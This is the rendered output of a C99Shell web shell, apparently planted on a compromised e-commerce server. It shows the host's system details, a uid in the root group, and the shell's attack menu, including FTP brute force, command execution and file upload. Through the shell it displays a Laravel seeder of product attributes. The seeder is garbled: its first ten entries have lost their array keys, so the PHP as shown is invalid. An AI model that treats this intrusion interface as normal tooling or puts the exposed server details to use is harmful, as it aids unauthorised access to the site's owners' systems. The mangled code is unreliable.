!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/database/seeders/   drwxr-xr-x
Free 26.01 GB of 117.98 GB (22.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AttributesTableSeeder.php (18.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Database\Seeders;

use 
Illuminate\Database\Seeder;

class 
AttributesTableSeeder extends Seeder
{

    
/**
     * Auto generated seed file
     *
     * @return void
     */
    
public function run()
    {
        

        
\DB::table('attributes')->delete();
        
        
\DB::table('attributes')->insert(array (
            
=> 
            array (
                
'id' => 26,
                
'attribute_group_id' => 28,
                
'name' => 'Color',
                
'description' => NULL,
                
'type' => 'dropdown',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 27,
                
'attribute_group_id' => 28,
                
'name' => 'RAM',
                
'description' => NULL,
                
'type' => 'dropdown',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 28,
                
'attribute_group_id' => 28,
                
'name' => 'Storage',
                
'description' => NULL,
                
'type' => 'dropdown',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 29,
                
'attribute_group_id' => 28,
                
'name' => 'Model Number',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 30,
                
'attribute_group_id' => 28,
                
'name' => 'Model Name',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 0,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 31,
                
'attribute_group_id' => 28,
                
'name' => 'Touchscreen',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 0,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 32,
                
'attribute_group_id' => 28,
                
'name' => 'Browse Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 33,
                
'attribute_group_id' => 28,
                
'name' => 'Display Size',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 34,
                
'attribute_group_id' => 28,
                
'name' => 'Resolution',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
=> 
            array (
                
'id' => 35,
                
'attribute_group_id' => 28,
                
'name' => 'Display Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
10 => 
            array (
                
'id' => 36,
                
'attribute_group_id' => 28,
                
'name' => 'Operating System',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
11 => 
            array (
                
'id' => 37,
                
'attribute_group_id' => 28,
                
'name' => 'Processor Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
12 => 
            array (
                
'id' => 38,
                
'attribute_group_id' => 28,
                
'name' => 'Sim Type',
                
'description' => NULL,
                
'type' => 'dropdown',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
13 => 
            array (
                
'id' => 39,
                
'attribute_group_id' => 28,
                
'name' => 'Network Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
14 => 
            array (
                
'id' => 40,
                
'attribute_group_id' => 28,
                
'name' => 'Battery Capacity',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
15 => 
            array (
                
'id' => 41,
                
'attribute_group_id' => 28,
                
'name' => 'Weight',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
16 => 
            array (
                
'id' => 42,
                
'attribute_group_id' => 28,
                
'name' => 'SIM Size',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
17 => 
            array (
                
'id' => 55,
                
'attribute_group_id' => 28,
                
'name' => 'Processor Core',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 0,
                
'is_required' => 1,
            ),
            
18 => 
            array (
                
'id' => 239,
                
'attribute_group_id' => 28,
                
'name' => 'Removable Battery',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
19 => 
            array (
                
'id' => 241,
                
'attribute_group_id' => 28,
                
'name' => 'Bluetooth Version',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
20 => 
            array (
                
'id' => 265,
                
'attribute_group_id' => 29,
                
'name' => 'Operating Frequency',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
21 => 
            array (
                
'id' => 267,
                
'attribute_group_id' => 29,
                
'name' => 'Smartphones',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
22 => 
            array (
                
'id' => 276,
                
'attribute_group_id' => 32,
                
'name' => 'Battery Cell',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
23 => 
            array (
                
'id' => 277,
                
'attribute_group_id' => 32,
                
'name' => 'Processor Brand',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
24 => 
            array (
                
'id' => 278,
                
'attribute_group_id' => 32,
                
'name' => 'Processor Name',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
25 => 
            array (
                
'id' => 279,
                
'attribute_group_id' => 32,
                
'name' => 'Processor Generation',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
26 => 
            array (
                
'id' => 281,
                
'attribute_group_id' => 32,
                
'name' => 'SSD',
                
'description' => 'Describe Storage of hp laptops',
                
'type' => 'dropdown',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 1,
            ),
            
27 => 
            array (
                
'id' => 282,
                
'attribute_group_id' => 32,
                
'name' => 'Number of Cores',
                
'description' => 'Describe Number of Cores of hp laptops',
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
28 => 
            array (
                
'id' => 284,
                
'attribute_group_id' => 32,
                
'name' => 'System Architecture',
                
'description' => 'Describe System Architecture of hp laptops',
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
29 => 
            array (
                
'id' => 285,
                
'attribute_group_id' => 32,
                
'name' => 'Screen Size',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
30 => 
            array (
                
'id' => 286,
                
'attribute_group_id' => 32,
                
'name' => 'Screen Resolution',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
31 => 
            array (
                
'id' => 292,
                
'attribute_group_id' => 32,
                
'name' => 'Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
32 => 
            array (
                
'id' => 298,
                
'attribute_group_id' => 32,
                
'name' => 'OS Architecture',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
33 => 
            array (
                
'id' => 299,
                
'attribute_group_id' => 32,
                
'name' => 'Dimensions',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
34 => 
            array (
                
'id' => 305,
                
'attribute_group_id' => 32,
                
'name' => 'Battery Backup',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
35 => 
            array (
                
'id' => 322,
                
'attribute_group_id' => 32,
                
'name' => 'RAM Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
36 => 
            array (
                
'id' => 341,
                
'attribute_group_id' => 33,
                
'name' => 'Brand',
                
'description' => 'Describe brand of dslr',
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
37 => 
            array (
                
'id' => 344,
                
'attribute_group_id' => 33,
                
'name' => 'Video Resolution',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
38 => 
            array (
                
'id' => 347,
                
'attribute_group_id' => 33,
                
'name' => 'Battery Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
39 => 
            array (
                
'id' => 349,
                
'attribute_group_id' => 33,
                
'name' => 'Sensor Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
40 => 
            array (
                
'id' => 357,
                
'attribute_group_id' => 33,
                
'name' => 'Image Sensor Size',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
41 => 
            array (
                
'id' => 359,
                
'attribute_group_id' => 33,
                
'name' => 'Touch Screen',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
42 => 
            array (
                
'id' => 365,
                
'attribute_group_id' => 33,
                
'name' => 'Image Sensor Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
43 => 
            array (
                
'id' => 368,
                
'attribute_group_id' => 33,
                
'name' => 'Video Quality',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
44 => 
            array (
                
'id' => 370,
                
'attribute_group_id' => 33,
                
'name' => 'Compatible Card',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
45 => 
            array (
                
'id' => 372,
                
'attribute_group_id' => 33,
                
'name' => 'Lens Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
46 => 
            array (
                
'id' => 376,
                
'attribute_group_id' => 33,
                
'name' => 'Battery',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
47 => 
            array (
                
'id' => 383,
                
'attribute_group_id' => 33,
                
'name' => 'Video Format',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
48 => 
            array (
                
'id' => 388,
                
'attribute_group_id' => 33,
                
'name' => 'Display Resolution',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
49 => 
            array (
                
'id' => 393,
                
'attribute_group_id' => 33,
                
'name' => 'Storage Type',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
            
50 => 
            array (
                
'id' => 397,
                
'attribute_group_id' => 33,
                
'name' => 'HDD Available',
                
'description' => NULL,
                
'type' => 'field',
                
'status' => 'Active',
                
'is_filterable' => 1,
                
'is_required' => 0,
            ),
        ));
        
        
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--